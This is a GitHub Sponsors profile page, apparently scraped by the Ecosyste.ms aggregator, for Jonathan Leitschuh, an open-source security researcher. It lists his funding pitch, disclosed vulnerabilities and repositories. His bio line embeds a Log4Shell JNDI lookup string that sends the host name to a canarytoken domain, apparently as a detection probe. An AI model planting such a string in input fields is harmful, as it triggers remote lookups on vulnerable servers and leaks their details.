Ecosyste.ms sponsors
An open API service aggregating public data about GitHub Sponsors.
An open API service aggregating public data about GitHub Sponsors.
Software Engineer & Security Researcher; First Dan Kaminsky Fellow @ HUMAN Security; ${jndi:ldap://x${hostName}.L4J.lile3fakwhyqg99zgj0yytxz7.canarytoken
Funding Links: https://github.com/sponsors/JLLeitschuh
Jonathan Leitschuh
Open-Source Software Security Researcher
I find and report security vulnerabilities in open-source software.
I enjoy giving back to the community through OSS Security Research. It's deeply satisfying to have the opportunity to help and protect users.
The unfortunate reality is that the OSS is underfunded and there's even less invested in security research to find vulnerabilities in these critical components.
By sponsoring my work, you will be sponsoring security research into potentially critical areas of your own software stack, hidden deep within your applications.
My CodeQL driven security research currently primarily focuses on the Java ecosystem with some forays into Python and Javascript. However, my security-research strengths primarily lie in the Java ecosystem.
Notable Security Research
🔥 Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!
🔥 Want to take over the Java ecosystem? All you need is a MITM!
🔥 Leveraging Gradle Plugin wildcard versions for remote code execution
Other Security Disclosures
Less flashy, but were still a lot of fun to find and report!
CVE-2019-10758: Remote Code Execution Vulnerability in Mongo-Express
There's even more than this though! You can find my current vulnerability findings to date in this Google Sheet here.
Other Content
I do a lot of cool stuff. I try to keep my GitHub Stars Profile up-to-date with my latests content.
When you're done here, follow me on Twitter! @JLLeitschuh
Public disclosure channel for security vulnerabilities
Language: Python - Stars: 16Program for rapidly developing computer vision applications
Language: Java - Stars: 379A ktlint gradle plugin
Language: Kotlin - Stars: 1483Adaptable, fast automation for all
Language: Groovy - Stars: 17018Official Repository of WPILibJ and WPILibC
Language: C++ - Stars: 1084Convenience Kotlin API over the Google Guice DI Library
Language: Kotlin - Stars: 18